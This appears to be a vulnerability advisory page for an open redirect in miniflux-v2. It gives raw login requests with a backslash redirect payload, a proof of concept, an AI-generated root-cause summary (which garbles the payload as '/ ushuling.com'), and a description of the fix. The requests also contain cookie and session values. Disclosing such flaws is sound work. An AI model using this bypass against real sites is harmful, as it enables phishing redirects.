Open Redirect Bypass in miniflux-v2
Description
Summary
The URL restrictions in miniflux-v2 can be bypassed by attackers, leading to an open redirect vulnerability.
Details
Normally, the redirect URL needs to be validated using IsRelativePath.
There are some security measures in place, such as requiring relative paths, prohibiting host and schema entries, and rejecting proof-of-concept (PoC) entries like //fushuling.com. However, these measures can still be bypassed.
For a proof-of-concept (PoC) like /\fushuling.com, it lacks host and netloc fields and doesn't start with //, but during the actual browser redirection, the backslash is automatically parsed as a forward slash, ultimately redirecting to the external address https://fushuling.com, thus bypassing existing protections.
For PoCs like //fushuling.com, the existing logic successfully detects and resolves to /unread, effectively preventing attacks.
POST /login HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 92
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cw_conversation=eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiI1NTlhZGZkNS0wMTMxLTRjOWUtYjJmMi1kZTQ4YzFmMzUwODMiLCJpbmJveF9pZCI6NTI3NTUsImV4cCI6MTc5MTk3MzU4OCwiaWF0IjoxNzc2NDIxNTg4fQ._8EAAv62saWBzO54yUJCbASbjbrNdMsYEC49blqJwQM; casdoor_session_id=cc333aee41d646565c1bde0bba532991; SSID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.KKPgzj5eEsDglYQXFeERpo7F97-phtpOsQL0Sh9e_EA; sid=Q5hex9PpdqFKeVL41zT4W9DqyBnMJhVO; MinifluxSessionID=F5GAIDVFDZVTOTOWBLWKXCRNIE.HUQLKF4BMK42KUAM3N2VK4MA45
Connection: close
csrf=CYJ2SHTG7AYLMFW6TMTLRR4K54&redirect_url=//fushuling.com&username=admin&password=test123
However, when the attacker specified the redirect URL as /\fushuling.com, the URL successfully bypassed the detection and set the location to /\fushuling.com.
POST /login HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 92
Cache-Control: max-age=0
sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: cw_conversation=eyJhbGciOiJIUzI1NiJ9.eyJzb3VyY2VfaWQiOiI1NTlhZGZkNS0wMTMxLTRjOWUtYjJmMi1kZTQ4YzFmMzUwODMiLCJpbmJveF9pZCI6NTI3NTUsImV4cCI6MTc5MTk3MzU4OCwiaWF0IjoxNzc2NDIxNTg4fQ._8EAAv62saWBzO54yUJCbASbjbrNdMsYEC49blqJwQM; casdoor_session_id=cc333aee41d646565c1bde0bba532991; SSID=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.KKPgzj5eEsDglYQXFeERpo7F97-phtpOsQL0Sh9e_EA; sid=Q5hex9PpdqFKeVL41zT4W9DqyBnMJhVO; MinifluxSessionID=54R3C5MYFRCW7JVL2WUP5GFW4Z.3FLK5B4S7R3O6ZRACB7A3B2RG5
Connection: close
csrf=QC7PJNLRRDHSF6OZPXFVPKAXEO&redirect_url=/\fushuling.com&username=admin&password=test123
In the actual browser redirection, the URL successfully redirected to https://fushuling.com, thus bypassing the restrictions and achieving an open redirect attack.
PoC
/\fushuling.com
Impact
Open Redirect
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
1Patches
Vulnerability mechanics
Root cause
"Missing input validation for backslashes in the relative path check allows browser normalization to convert a seemingly relative path into an external redirect."
Attack vector
An attacker sends a crafted POST request to the `/login` endpoint with a `redirect_url` parameter containing a backslash, such as `/ ushuling.com`. Go's `url.Parse` interprets this as a relative path (no host or scheme), so the existing `IsRelativePath` check passes. However, the browser normalizes the backslash to a forward slash, turning the target into `//fushuling.com`, which the browser resolves as a scheme-relative URL pointing to an external host. This bypasses the security measures and achieves an open redirect. [ref_id=1]
Affected code
The vulnerability resides in the `IsRelativePath` function in `internal/urllib/url.go`. This function is used to validate redirect URLs during login and other redirect flows. The function did not reject backslashes, allowing an attacker to supply a payload like `/ ushuling.com` which Go's `url.Parse` treats as a relative path but browsers normalize to `//fushuling.com`, resulting in an open redirect.
What the fix does
The patch adds a check at the top of `IsRelativePath` in `internal/urllib/url.go` that rejects any link containing a backslash (`\`) before the URL is parsed. This closes the discrepancy between Go's URL parser (which treats backslashes as ordinary path characters) and browser behavior (which normalizes backslashes to forward slashes). The commit message explicitly explains that this prevents open redirects via payloads like `/ ushuling.com`. [patch_id=6634781]
Preconditions
- networkThe attacker must be able to submit a login request (or any request that uses the redirect_url parameter) to the miniflux-v2 instance.
- inputThe attacker must craft a redirect_url containing a backslash, e.g., /\fushuling.com.
Generated on Jun 19, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.